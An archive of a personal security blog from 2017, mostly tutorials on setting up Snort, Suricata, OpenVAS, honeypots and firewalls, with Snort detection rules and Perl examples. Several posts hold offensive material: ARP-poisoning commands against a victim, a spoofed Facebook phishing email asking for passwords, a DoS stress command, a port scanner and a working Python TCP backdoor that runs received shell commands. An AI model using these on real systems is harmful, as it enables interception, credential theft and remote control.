SPF actually is a TXT record on your DNS server. Please kindly review the picture shown as follows:
Monday, December 18, 2017
Regarding SPF Record eliminating SPAM.
More details can refer to http://www.openspf.org/SPF_Record_Syntax
SPF actually is a TXT record on your DNS server. Please kindly review the picture shown as follows:
SPF actually is a TXT record on your DNS server. Please kindly review the picture shown as follows:
Sunday, December 10, 2017
Install and configure Suricata at Raspberry Pi
Installation:
# apt-get update; apt-get install suricata
# cp /etc/suricata/suricata.yaml /etc/suricata/suricata.yaml.bak
# cd /etc/suricata/rules
# wget https://rules.emergingthreats.net/open/suricata-2.0/emerging-all.rules
# vi /etc/suricata/suricata.yaml
Guarantee that the line below appears in the suricata.yaml file:
- emerging-all.rules
Execution:
# suricata -c /etc/suricata/suricata.yaml -i wlan0
Running as a Daemon:
# suricata -c /etc/suricata/suricata.yaml -i wlan0 -D
Reading the alert log:
# tail -n 10 -f /var/log/suricata/fast.log
# apt-get update; apt-get install suricata
# cp /etc/suricata/suricata.yaml /etc/suricata/suricata.yaml.bak
# cd /etc/suricata/rules
# wget https://rules.emergingthreats.net/open/suricata-2.0/emerging-all.rules
# vi /etc/suricata/suricata.yaml
Guarantee that the line below appears in the suricata.yaml file:
- emerging-all.rules
Execution:
# suricata -c /etc/suricata/suricata.yaml -i wlan0
Running as a Daemon:
# suricata -c /etc/suricata/suricata.yaml -i wlan0 -D
Reading the alert log:
# tail -n 10 -f /var/log/suricata/fast.log
Saturday, December 2, 2017
Implement ARP POISIONING in Command Line on Kali Linux
1) Enable the IP Forward function by executing the command below:
echo 1 > /proc/sys/net/ipv4/ip_forward
2) Run Arpspoof as shown below.
Usage:
arpspoof -i eth0 -t VICTIM_IP -r GATEWAY_IP
Example:
arpspoof -i eth0 -t 172.31.99.251 -r 172.31.98.1
Once the steps above are successfully completed, all traffic from 172.31.99.251 (i.e. the victim) to 172.31.98.1 (i.e. the gateway) will go through your PC.
echo 1 > /proc/sys/net/ipv4/ip_forward
2) Run Arpspoof as shown below.
Usage:
arpspoof -i eth0 -t VICTIM_IP -r GATEWAY_IP
Example:
arpspoof -i eth0 -t 172.31.99.251 -r 172.31.98.1
Once the steps above are successfully completed, all traffic from 172.31.99.251 (i.e. the victim) to 172.31.98.1 (i.e. the gateway) will go through your PC.
Sunday, November 5, 2017
Installing a honeypot called LaBrea on Raspberry Pi
root@raspberrypi:~#apt-get update
root@raspberrypi:~#apt-get install labrea
root@raspberrypi:~#vi /etc/labrea.conf
#
# This is a comment
#
#Exclude 192.168.0.1 through 192.168.0.252
192.168.0.1 - 192.168.0.252 EXC
#Hard exclude 192.168.0.253
#192.168.0.253 HAR
#Do not capture packets from 192.168.1.0/24
#192.168.1.0/24 IPI
#Do not tarpit / persist capture on ports 21-25:
#21-25 POR
#When firewalling, make port 12345 active at startup:
#12345 PMN
[ESC]:wq
root@raspberrypi:~#/usr/sbin/labrea -z -q -h -s -v -v -f -b -X -d -o -p 2000000 --init-f /etc/labrea.conf -i wlan0
root@raspberrypi:~#apt-get install labrea
root@raspberrypi:~#vi /etc/labrea.conf
#
# This is a comment
#
#Exclude 192.168.0.1 through 192.168.0.252
192.168.0.1 - 192.168.0.252 EXC
#Hard exclude 192.168.0.253
#192.168.0.253 HAR
#Do not capture packets from 192.168.1.0/24
#192.168.1.0/24 IPI
#Do not tarpit / persist capture on ports 21-25:
#21-25 POR
#When firewalling, make port 12345 active at startup:
#12345 PMN
[ESC]:wq
root@raspberrypi:~#/usr/sbin/labrea -z -q -h -s -v -v -f -b -X -d -o -p 2000000 --init-f /etc/labrea.conf -i wlan0
Saturday, October 21, 2017
A simple application for sending fake emails in Kali Linux.
In Kali linux, there is an application called sendemail allowing users to send fake emails. Its usage is shown as follows:
sendemail -f source_email_address -t destination_email_address -u email_subject -m email_content -s email_server:email_service_port
Here is a sample for sending those mock emails.
#sendemail -f admin@facebook.com -t alex@gmail.com -u 'Your Facebook account is expired!' -m 'Please send back your Facebook account and password to hacker@gmail.com.' -s 192.168.1.10:25
sendemail -f source_email_address -t destination_email_address -u email_subject -m email_content -s email_server:email_service_port
Here is a sample for sending those mock emails.
#sendemail -f admin@facebook.com -t alex@gmail.com -u 'Your Facebook account is expired!' -m 'Please send back your Facebook account and password to hacker@gmail.com.' -s 192.168.1.10:25
Wednesday, September 13, 2017
An example for Apriori coded in Perl
#!/usr/bin/perl -w
use Data::Mining::Apriori;
$|=1;
$apriori = new Data::Mining::Apriori;
$apriori->{metrics}{minSupport}=0.0155; # The minimum support(required), default value is 0.01(1%)
$apriori->{metrics}{minConfidence}=0.0155; # The minimum confidence(required), default value is 0.10(10%)
$apriori->{metrics}{minLift}=1; # The minimum lift(optional)
$apriori->{metrics}{minLeverage}=0; # The minimum leverage(optional)
$apriori->{metrics}{minConviction}=0; # The minimum conviction(optional)
$apriori->{metrics}{minCoverage}=0; # The minimum coverage(optional)
$apriori->{metrics}{minCorrelation}=0; # The minimum correlation(optional)
$apriori->{metrics}{minCosine}=0; # The minimum cosine(optional)
$apriori->{metrics}{minLaplace}=0; # The minimum laplace(optional)
$apriori->{metrics}{minJaccard}=0; # The minimum jaccard(optional)
#$apriori->{output}=1;
# The output type(optional): 1 - Export to text file delimited by tab; 2 - Export to excel file with chart.
#$apriori->{pathOutputFiles}='data/'; # The path to output files(optional)
$apriori->{messages}=1; # A value boolean to display the messages(optional)
$apriori->{keyItemsDescription}{'101'}='MILK'; # Hash table reference to add items by key and description
$apriori->{keyItemsDescription}{102}='BREAD';
$apriori->{keyItemsDescription}{'103'}='CEREAL';
@items=(103,101);
$apriori->insert_key_items_transaction(\@items); # Insert key items by transaction
$apriori->insert_key_items_transaction([103,102]);
$apriori->insert_key_items_transaction([103,101]);
$apriori->insert_key_items_transaction([103,101,102]);
$apriori->insert_key_items_transaction([101,102]);
$apriori->insert_key_items_transaction([103,101,102]);
$apriori->insert_key_items_transaction([103,101]);
$apriori->insert_key_items_transaction([103,102]);
$apriori->insert_key_items_transaction([103,101,102]);
$apriori->insert_key_items_transaction([103,101,102]);
print "\n${\$apriori->quantity_possible_rules}"; # Show the quantity of possible rules
$apriori->{limitRules}=10; # The limit of rules(optional)
$apriori->{limitSubsets}=12; # The limit of subsets(optional)
$apriori->generate_rules;
# Generate association rules to no longer meet the minimum support, confidence, lift, leverage, conviction, coverage, correlation, cosine, laplace, jaccard or limit of rules
print "\n@{$apriori->{frequentItemset}}\n"; # Show frequent items
exit(1);
use Data::Mining::Apriori;
$|=1;
$apriori = new Data::Mining::Apriori;
$apriori->{metrics}{minSupport}=0.0155; # The minimum support(required), default value is 0.01(1%)
$apriori->{metrics}{minConfidence}=0.0155; # The minimum confidence(required), default value is 0.10(10%)
$apriori->{metrics}{minLift}=1; # The minimum lift(optional)
$apriori->{metrics}{minLeverage}=0; # The minimum leverage(optional)
$apriori->{metrics}{minConviction}=0; # The minimum conviction(optional)
$apriori->{metrics}{minCoverage}=0; # The minimum coverage(optional)
$apriori->{metrics}{minCorrelation}=0; # The minimum correlation(optional)
$apriori->{metrics}{minCosine}=0; # The minimum cosine(optional)
$apriori->{metrics}{minLaplace}=0; # The minimum laplace(optional)
$apriori->{metrics}{minJaccard}=0; # The minimum jaccard(optional)
#$apriori->{output}=1;
# The output type(optional): 1 - Export to text file delimited by tab; 2 - Export to excel file with chart.
#$apriori->{pathOutputFiles}='data/'; # The path to output files(optional)
$apriori->{messages}=1; # A value boolean to display the messages(optional)
$apriori->{keyItemsDescription}{'101'}='MILK'; # Hash table reference to add items by key and description
$apriori->{keyItemsDescription}{102}='BREAD';
$apriori->{keyItemsDescription}{'103'}='CEREAL';
@items=(103,101);
$apriori->insert_key_items_transaction(\@items); # Insert key items by transaction
$apriori->insert_key_items_transaction([103,102]);
$apriori->insert_key_items_transaction([103,101]);
$apriori->insert_key_items_transaction([103,101,102]);
$apriori->insert_key_items_transaction([101,102]);
$apriori->insert_key_items_transaction([103,101,102]);
$apriori->insert_key_items_transaction([103,101]);
$apriori->insert_key_items_transaction([103,102]);
$apriori->insert_key_items_transaction([103,101,102]);
$apriori->insert_key_items_transaction([103,101,102]);
print "\n${\$apriori->quantity_possible_rules}"; # Show the quantity of possible rules
$apriori->{limitRules}=10; # The limit of rules(optional)
$apriori->{limitSubsets}=12; # The limit of subsets(optional)
$apriori->generate_rules;
# Generate association rules to no longer meet the minimum support, confidence, lift, leverage, conviction, coverage, correlation, cosine, laplace, jaccard or limit of rules
print "\n@{$apriori->{frequentItemset}}\n"; # Show frequent items
exit(1);
Monday, September 4, 2017
An example for Decision Tree with Perl
#!/usr/bin/perl -w
#Refer to http://search.cpan.org/~kwilliams/AI-DecisionTree-0.11/lib/AI/DecisionTree.pm
use AI::DecisionTree;
$dtree = new AI::DecisionTree;
$dtree->add_instance(attributes => {outlook => 'sunny',
temperature => 'hot',
humidity => 'high'},
result => 'no');
$dtree->add_instance(attributes => {outlook => 'sunny',
temperature => 'hot',
humidity => 'normal'},
result => 'yes');
$dtree->add_instance(attributes => {outlook => 'overcast',
temperature => 'cold',
humidity => 'normal'},
result => 'no');
$dtree->add_instance(attributes => {outlook => 'sunny',
temperature => 'cold',
humidity => 'normal'},
result => 'yes');
$dtree->train;
$result = $dtree->get_result(attributes => {outlook => 'sunny',
temperature => 'hot',
humidity => 'normal'});
print $result."\n";
exit(1);
#Refer to http://search.cpan.org/~kwilliams/AI-DecisionTree-0.11/lib/AI/DecisionTree.pm
use AI::DecisionTree;
$dtree = new AI::DecisionTree;
$dtree->add_instance(attributes => {outlook => 'sunny',
temperature => 'hot',
humidity => 'high'},
result => 'no');
$dtree->add_instance(attributes => {outlook => 'sunny',
temperature => 'hot',
humidity => 'normal'},
result => 'yes');
$dtree->add_instance(attributes => {outlook => 'overcast',
temperature => 'cold',
humidity => 'normal'},
result => 'no');
$dtree->add_instance(attributes => {outlook => 'sunny',
temperature => 'cold',
humidity => 'normal'},
result => 'yes');
$dtree->train;
$result = $dtree->get_result(attributes => {outlook => 'sunny',
temperature => 'hot',
humidity => 'normal'});
print $result."\n";
exit(1);
Monday, August 28, 2017
Install OpenVAS in Kali Linux
1) Use apt-get to install OpenVAS.
#apt-get update
#apt-get install openvas openvas-cli openvas-manager openvas-manager-common openvas-scanner greenbone-security-assistant greenbone-security-assistant-common
2) Utilize openvas-setup to configure OpenVAS.
#openvas-setup
After the processing is done, the temporary password shows up. Record the password.
3) Run openvas-start.
#openvas-start
4) Open a browser before surfing https://127.0.0.1:9392/.
5) Leverage the username admin and the aforementioned password to log in.
6) Enjoy! Don't forget changing your password for the first time you log in.
#apt-get update
#apt-get install openvas openvas-cli openvas-manager openvas-manager-common openvas-scanner greenbone-security-assistant greenbone-security-assistant-common
2) Utilize openvas-setup to configure OpenVAS.
#openvas-setup
After the processing is done, the temporary password shows up. Record the password.
3) Run openvas-start.
#openvas-start
4) Open a browser before surfing https://127.0.0.1:9392/.
5) Leverage the username admin and the aforementioned password to log in.
6) Enjoy! Don't forget changing your password for the first time you log in.
Wednesday, July 12, 2017
A Snort rule file for identifying SQL Injection and XSS
#https://www.symantec.com/connect/articles/detection-sql-injection-and-cross-site-scripting-attacks
alert tcp any any -> any $HTTP_PORTS (msg:"SQL Injection - Paranoid";flow:to_server,established;pcre:"/(\%27)|(\')|(\-\-)|(%23)|(#)/i"; classtype:Web-application-attack; sid:909900;rev:5;)
#alert tcp any any -> any $HTTP_PORTS (msg:"Modified regex for detection of SQL meta-characters";flow:to_server,established;pcre:"/((\%3D)|(=))[^\n]*((\%27)|(\')|(\-\-)|(\%3B)|(\;))/i"; classtype:Web-application-attack; sid:910000;rev:5;)
alert tcp any any -> any $HTTP_PORTS (msg:"Regex for typical SQL Injection attack";flow:to_server,established;pcre:"/\w*((\%27)|(\'))((\%6F)|o|(\%4F))((\%72)|r|(\%52))/ix"; classtype:Web-application-attack; sid:910001;rev:5;)
alert tcp any any -> any $HTTP_PORTS (msg:"Regex for detecting SQL Injection with the UNION keyword";flow:to_server,established;pcre:"/((\%27)|(\'))union/ix"; classtype:Web-application-attack; sid:910002;rev:5;)
alert tcp any any -> any $HTTP_PORTS (msg:"Regex for detecting SQL Injection attacks on a MS SQL Server";flow:to_server,established;pcre:"/exec(\s|\+)+(s|x)p\w+/ix"; classtype:Web-application-attack; sid:910003;rev:5;)
alert tcp any any -> any $HTTP_PORTS (msg:"Regex for simple CSS attack";flow:to_server,established;pcre:"/((\%3C)|<)((\%2F)|\/)*[a-z0-9\%]+((\%3E)|>)/ix"; classtype:Web-application-attack; sid:910004;rev:5;)
alert tcp any any -> any $HTTP_PORTS (msg:"Regex for img src CSS attack";flow:to_server,established;pcre:"/((\%3C)|<)((\%69)|i|(\%49))((\%6D)|m|(\%4D))((\%67)|g|(\%47))[^\n]+((\%3E)|>)/I"; classtype:Web-application-attack; sid:910005;rev:5;)
alert tcp any any -> any $HTTP_PORTS (msg:"Paranoid regex for CSS attacks";flow:to_server,established;pcre:"/((\%3C)|<)[^\n]+((\%3E)|>)/I"; classtype:Web-application-attack; sid:910006;rev:5;)
alert tcp any any -> any $HTTP_PORTS (msg:"SQL Injection - Paranoid";flow:to_server,established;pcre:"/(\%27)|(\')|(\-\-)|(%23)|(#)/i"; classtype:Web-application-attack; sid:909900;rev:5;)
#alert tcp any any -> any $HTTP_PORTS (msg:"Modified regex for detection of SQL meta-characters";flow:to_server,established;pcre:"/((\%3D)|(=))[^\n]*((\%27)|(\')|(\-\-)|(\%3B)|(\;))/i"; classtype:Web-application-attack; sid:910000;rev:5;)
alert tcp any any -> any $HTTP_PORTS (msg:"Regex for typical SQL Injection attack";flow:to_server,established;pcre:"/\w*((\%27)|(\'))((\%6F)|o|(\%4F))((\%72)|r|(\%52))/ix"; classtype:Web-application-attack; sid:910001;rev:5;)
alert tcp any any -> any $HTTP_PORTS (msg:"Regex for detecting SQL Injection with the UNION keyword";flow:to_server,established;pcre:"/((\%27)|(\'))union/ix"; classtype:Web-application-attack; sid:910002;rev:5;)
alert tcp any any -> any $HTTP_PORTS (msg:"Regex for detecting SQL Injection attacks on a MS SQL Server";flow:to_server,established;pcre:"/exec(\s|\+)+(s|x)p\w+/ix"; classtype:Web-application-attack; sid:910003;rev:5;)
alert tcp any any -> any $HTTP_PORTS (msg:"Regex for simple CSS attack";flow:to_server,established;pcre:"/((\%3C)|<)((\%2F)|\/)*[a-z0-9\%]+((\%3E)|>)/ix"; classtype:Web-application-attack; sid:910004;rev:5;)
alert tcp any any -> any $HTTP_PORTS (msg:"Regex for img src CSS attack";flow:to_server,established;pcre:"/((\%3C)|<)((\%69)|i|(\%49))((\%6D)|m|(\%4D))((\%67)|g|(\%47))[^\n]+((\%3E)|>)/I"; classtype:Web-application-attack; sid:910005;rev:5;)
alert tcp any any -> any $HTTP_PORTS (msg:"Paranoid regex for CSS attacks";flow:to_server,established;pcre:"/((\%3C)|<)[^\n]+((\%3E)|>)/I"; classtype:Web-application-attack; sid:910006;rev:5;)
Monday, July 10, 2017
What make security products eligible to be sold? [PART II]
As a cybersecurity product being sold in United States, the two certificates shown herein should be obtained.
- Common Criteria (At least EAL2+)
- The Federal Information Processing Standard (FIPS) Publication 140-2, (FIPS PUB 140-2)
- Common Criteria (At least EAL2+)
- The Federal Information Processing Standard (FIPS) Publication 140-2, (FIPS PUB 140-2)
Sunday, July 9, 2017
Two good sites providing Packet Analysis solutions.
http://www.malware-traffic-analysis.net/
Providing a variety of PCAP files, allowing
you to analyze.
https://packettotal.com/
Similar to Virus Total, it offers an
interface enabling you to submit any suspicious packet to analyze.
Thursday, June 15, 2017
How long cybersecurity logs should be retained according to DFS.
Retrieved from http://www.dfs.ny.gov/legal/regulations/adoptions/dfsrf500txt.pdf
Based on Section 500.06 Audit Trail, the audit trails relevant to Cybersecurity should be kept for not fewer than 3 years.
Based on Section 500.06 Audit Trail, the audit trails relevant to Cybersecurity should be kept for not fewer than 3 years.
Saturday, May 20, 2017
Sandbox solutions
Sandbox technique would be utilized for filtering out malicious data from the data at rest and on motion. The technique known as Deep Content Inspection (i.e. DCI) can be applied with Sandbox against the data on motion.
The content below itemizes multiple Sandbox solutions.
Commonly used Online solutions are:
Malwr,
Anubis,
ThreatExpert,
Comodo,
ThreatTrack ThreatAnalyzer,
Xandora,
CWSandbox (not updated since April 2010),
Malbox (not updated since May 2011, developers site not accessible anymore).
Commonly used Standalone solutions are:
Cuckoo,
ReVirt (not updated since June 2003),
Sandboxie,
Buster,
Minibis (not updated since June 2011),
Remnux,
Zero Wine Tryout,
Truman (not updated since January 2006),
BitBlaze (not updated since September 2009).
The content below itemizes multiple Sandbox solutions.
Commonly used Online solutions are:
Malwr,
Anubis,
ThreatExpert,
Comodo,
ThreatTrack ThreatAnalyzer,
Xandora,
CWSandbox (not updated since April 2010),
Malbox (not updated since May 2011, developers site not accessible anymore).
Commonly used Standalone solutions are:
Cuckoo,
ReVirt (not updated since June 2003),
Sandboxie,
Buster,
Minibis (not updated since June 2011),
Remnux,
Zero Wine Tryout,
Truman (not updated since January 2006),
BitBlaze (not updated since September 2009).
How to back up the rules of Windows Firewall in Windows 2003
Normally, all Windows-Firewall rules in Windows 2003 are stored at a specific key shown as follows.
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy
Therefore, backing up the key above is able to back up all rules. Whenever recovering rules is in needs, importing the key is able to achieve the purpose right away.
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy
Therefore, backing up the key above is able to back up all rules. Whenever recovering rules is in needs, importing the key is able to achieve the purpose right away.
Sunday, May 14, 2017
Suggestion regarding Wannacry from Symantec
https://www.symantec.com/connect/blogs/what-you-need-know-about-wannacry-ransomware
Sunday, May 7, 2017
RMIAS
https://upload.wikimedia.org/wikipedia/commons/d/da/A_Reference_Model_of_Information_Assurance_and_Security_%28RMIAS%29.png
What make security products eligible to be sold?
There are multiple credentials being supposed to be obtain before being sold. Those credentials are shown as follows:
- IPv6 Ready Logo Site | Phase-2 (https://www.ipv6ready.org/)
- VERACODE (https://www.veracode.com/)
- FCC (https://www.fcc.gov/)
- CB (http://www.iecee.org/certification/certificates/)
- CE (https://ec.europa.eu/growth/single-market/ce-marking_en)
Wednesday, May 3, 2017
Why would an administrator deploy a honeypot?
The answers below are from R.I.T.
1) To learn about hacker techniques
2) To lure attackers away from critical systems
3) To allow administrators to refine firewall rules
1) To learn about hacker techniques
2) To lure attackers away from critical systems
3) To allow administrators to refine firewall rules
Tuesday, May 2, 2017
Solve the issue of missing library files
Add those folders containing the corresponding library files to /etc/ld.so.conf before running the ldconfig command. There is an example shown as follows.
#sudo echo "/usr/local/lib" >> /etc/ld.so.conf
#sudo ldconfig
#sudo echo "/usr/local/lib" >> /etc/ld.so.conf
#sudo ldconfig
Friday, April 21, 2017
Manipulate WMI through Perl
Online Library:
Inquery Tool:
WMI Explorer (https://wmie.codeplex.com/)
An example of manipulating WMI through Perl
------------------------------
#!/usr/bin/perl -w
#use strict;
#Execute a command:
#wmic /node:remote_computer process call create "netstat.exe -ano"
use Win32::OLE;
$|=1;
print("Target IP: ");
$target=<STDIN>;
chop($target);
#my ( $ServiceSet, $Service );
eval { $NetworkAdapters = Win32::OLE->GetObject("
unless($@){
print "\n";
foreach $Adapter (in $NetworkAdapters){
}
}else{
print STDERR Win32::OLE->LastError, "\n";
}
------------------------------
Install Snort in Kali through Source Code on 20170421
#cd /usr/local/sbin
#wget http://www.tcpdump.org/release/libpcap-1.8.1.tar.gz
#tar -zxvf ./libpcap-1.8.1.tar.gz
#cd libpcap-1.8.1
#./configure && make && make install
#cd /usr/local/sbin
#wget https://www.snort.org/downloads/snort/daq-2.0.6.tar.gz
#wget https://www.snort.org/downloads/snort/snort-2.9.9.0.tar.gz
#tar -zxvf ./daq-2.0.6.tar.gz
#cd daq-2.0.6
#./configure --with-libpcap-includes=/usr/local/sbin/libpcap-1.8.1 --with-libpcap-libraries=/usr/local/sbin/libpcap-1.8.1
#make && make install
#cd /usr/local/sbin
#wget ftp://ftp.csx.cam.ac.uk/pub/software/programming/pcre/pcre-8.40.tar.gz
#tar -zxvf ./pcre-8.40.tar.gz
#cd pcre-8.40
#./configure
#make && make install
#cd /usr/local/sbin
#wget https://cytranet.dl.sourceforge.net/project/libdnet/libdnet/libdnet-1.11/libdnet-1.11.tar.gz
#tar -zxvf ./libdnet-1.11.tar.gz
#cd libdnet-1.11
#./configure
#make && make install
#cd /usr/local/sbin
#wget http://www.zlib.net/zlib-1.2.11.tar.gz
#tar -zxvf ./zlib-1.2.11.tar.gz
#cd zlib-1.2.11
#./configure && make && make install
#cd /usr/local/sbin
#tar -zxvf ./snort-2.9.9.0.tar.gz
#cd snort-2.9.9.0
#./configure --enable-flexresp3 --enable-sourcefire --with-dnet-includes=/usr/local/sbin/libdnet-1.11/include --with-dnet-libraries=/usr/local/lib
#make && make install
#ln -s /usr/local/lib/libdnet.1.0.1 /lib/libdnet.1
#snort -V
#wget http://www.tcpdump.org/release/libpcap-1.8.1.tar.gz
#tar -zxvf ./libpcap-1.8.1.tar.gz
#cd libpcap-1.8.1
#./configure && make && make install
#cd /usr/local/sbin
#wget https://www.snort.org/downloads/snort/daq-2.0.6.tar.gz
#wget https://www.snort.org/downloads/snort/snort-2.9.9.0.tar.gz
#tar -zxvf ./daq-2.0.6.tar.gz
#cd daq-2.0.6
#./configure --with-libpcap-includes=/usr/local/sbin/libpcap-1.8.1 --with-libpcap-libraries=/usr/local/sbin/libpcap-1.8.1
#make && make install
#cd /usr/local/sbin
#wget ftp://ftp.csx.cam.ac.uk/pub/software/programming/pcre/pcre-8.40.tar.gz
#tar -zxvf ./pcre-8.40.tar.gz
#cd pcre-8.40
#./configure
#make && make install
#cd /usr/local/sbin
#wget https://cytranet.dl.sourceforge.net/project/libdnet/libdnet/libdnet-1.11/libdnet-1.11.tar.gz
#tar -zxvf ./libdnet-1.11.tar.gz
#cd libdnet-1.11
#./configure
#make && make install
#cd /usr/local/sbin
#wget http://www.zlib.net/zlib-1.2.11.tar.gz
#tar -zxvf ./zlib-1.2.11.tar.gz
#cd zlib-1.2.11
#./configure && make && make install
#cd /usr/local/sbin
#tar -zxvf ./snort-2.9.9.0.tar.gz
#cd snort-2.9.9.0
#./configure --enable-flexresp3 --enable-sourcefire --with-dnet-includes=/usr/local/sbin/libdnet-1.11/include --with-dnet-libraries=/usr/local/lib
#make && make install
#ln -s /usr/local/lib/libdnet.1.0.1 /lib/libdnet.1
#snort -V
Sunday, April 9, 2017
Saturday, April 8, 2017
Tuesday, April 4, 2017
Tuesday, March 28, 2017
Summarized instruction of the ufw in Kali
The ufw is a front-end of Iptables, and the gufw offers a GUI for the ufw.
The instuction below shows how to install and tweak the ufw in Kali.
/* Installation: */
# apt-get update
# apt-get install gufw
/* For the first time using: */
# ufw status verbose
Status: inactive
# vi /etc/ufw/policies.rules
------------------------------
#!/bin/sh
ufw allow proto tcp from 192.168.1.35 to 192.168.1.38 port 25
ufw allow proto tcp from 192.168.1.189 to 192.168.1.38 port 25
ufw allow in from 192.168.172.222 comment 'Alex PC'
ufw allow ssh
ufw deny in on eth0
ufw allow out on eth0
:wq
------------------------------
/* Bear in mind that the rules within the policies file would be executed from the top to the bottom. */
# chmod 744 /etc/ufw/policies.rules
# /etc/ufw/policies.rules
# ufw enable
/* For automatical startup: */
# systemctl enable ufw.service
/* For seeing more detail: */
# ufw status verbose
Saturday, March 25, 2017
A Snort rule dedicated to Syn Flood
#After testing, I figured out that 1500 SYN packets per second would be an appropriate metric for determining SYN Flood.
alert tcp any any -> $HOME_NET any (flags:S; msg:"Possible SYN Flood DoS"; flow:stateless; detection_filter:track by_dst, count 1500, seconds 1; classtype:attempted-dos; sid:1000890;)
alert tcp any any -> $HOME_NET any (flags:S; msg:"Possible SYN Flood DoS"; flow:stateless; detection_filter:track by_dst, count 1500, seconds 1; classtype:attempted-dos; sid:1000890;)
Thursday, March 16, 2017
Triggering SYN Flood and background stress traffic for NIDS test
Retrieved from http://tools.kali.org/tools-listing
In respect to triggering SYN Flood,
Metasploit Framework directly supports.
In response to achieving tons of stress
traffic in order to evaluate the performance of the tested NIDS, SlowHTTPTest
could be used. An example of running SlowHTTPTest is shown as follows:
slowhttptest -c 1000 -B -g -o report -i 110 -r 200 -s 8192 -t GET -u http://test.com -x 10 -p 3
Wednesday, January 11, 2017
A simple TCP port scanner
#!/usr/bin/python
import socket
import sys
try:
HOST=sys.argv[1]
except:
HOST='127.0.0.1'
PORTS=[8, 21, 22, 23, 80, 135, 139, 445, 8080]
for PORT in PORTS:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((HOST, PORT))
print "%s:%s is open!" % (HOST, PORT)
except:
print "%s:%s is close!" % (HOST, PORT)
s.close()
import socket
import sys
try:
HOST=sys.argv[1]
except:
HOST='127.0.0.1'
PORTS=[8, 21, 22, 23, 80, 135, 139, 445, 8080]
for PORT in PORTS:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((HOST, PORT))
print "%s:%s is open!" % (HOST, PORT)
except:
print "%s:%s is close!" % (HOST, PORT)
s.close()
A simple TCP backdoor
#!/usr/bin/python
import socket, sys, subprocess
class BreakOutOfALoop(Exception): pass
def execute( command ):
subprocess.check_output(command, shell=True)
return
HOST = '';
try:
PORT = sys.argv[1]
except:
PORT = 8888
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(1)
while 1:
try:
conn, addr = s.accept()
while 1:
conn.sendall("# ")
try:
data = conn.recv(1024)
except:
raise BreakOutOfALoop
execute(data)
#print type(data)
data = data[:-1]
conn.sendall("%s is executed!\r\n" % data)
except BreakOutOfALoop:
continue
conn.close()
s.close()
import socket, sys, subprocess
class BreakOutOfALoop(Exception): pass
def execute( command ):
subprocess.check_output(command, shell=True)
return
HOST = '';
try:
PORT = sys.argv[1]
except:
PORT = 8888
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(1)
while 1:
try:
conn, addr = s.accept()
while 1:
conn.sendall("# ")
try:
data = conn.recv(1024)
except:
raise BreakOutOfALoop
execute(data)
#print type(data)
data = data[:-1]
conn.sendall("%s is executed!\r\n" % data)
except BreakOutOfALoop:
continue
conn.close()
s.close()
Subscribe to:
Posts (Atom)